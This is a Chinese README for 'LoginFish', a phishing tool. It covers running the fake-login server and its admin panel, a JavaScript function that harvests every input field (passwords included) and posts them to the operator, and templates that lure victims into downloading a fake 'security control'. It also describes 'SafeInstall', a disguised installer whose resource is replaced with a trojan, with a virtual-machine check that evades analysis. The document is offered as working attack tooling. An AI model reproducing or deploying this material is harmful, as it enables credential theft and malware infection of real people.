LoginFish 通用钓鱼工具
使用方法
# 后台登录密码,请修改 password.txt
# 第一次运行会自动生成密码 写到 password.txt
# 后台地址 http://host:5522/admin/login
# 默认端口5522
./LoginFish port
./LoginFish 80
密码记录
可以参考/static/template/front_login_keylogger.html
文件
所有input
标签的内容都会被提交到后端,引用<script src="/static/dist/login.js"></script>
并把登录按钮绑定到login_submit()
函数即可
你也可以自定义login.js
,并控制登录之后的返回信息
比如说点击登录之后执行alert('帐号/密码校验不通过')
function login_submit() {
var input = document.getElementsByTagName('input')
var data = ''
for (var i = 0; i < input.length; i++) {
const put = input[i]
var name = ''
if (put.className) name = '_' + put.className
if (put.name) name = '_' + put.name
var key = `input[${i}${name}]=${put.value}`;
data = data + key + '&'
}
if (data != '') post(data)
console.log(data)
}
模板修改
打开static/template/
目录,默认有俩个模板,分别是front_login_1.html
和front_login.html
如果需要css
和js
文件则把其放在static/dist
中
模板中使用<script src="/static/dist/login.js"></script>
这样的路径进行引用
如果需要自定义模板,则在static/template/
中创建以front_
开头的html文件即可.
然后需要引用<script src="/static/dist/login.js"></script>
文件,再把某个下载按钮绑定到onclick_input
事件即可
<div onclick="onclick_input()">
<label for="password">密码</label>
<input name="password" class="password" type="password" disabled placeholder="下载安全控件" id="password">
</div>
或者你也可以直接使用<a href='/down'>下载</a>
这样的方式去绑定下载地址.
SafeInstall 模拟安全控件
使用Visual Studio 2015
与.NET 4.0
开发,替换木马需要修改资源文件中的load
如果需要关闭屏蔽虚拟机,则编辑SafeInstall/SafeInstall/Form1.cs
文件
public Form1()
{
checkVM(); //注释该行即可
writeFile();
InitializeComponent();
progressBar1.Value = 0;
timer1.Interval = 50;
timer1.Start();
}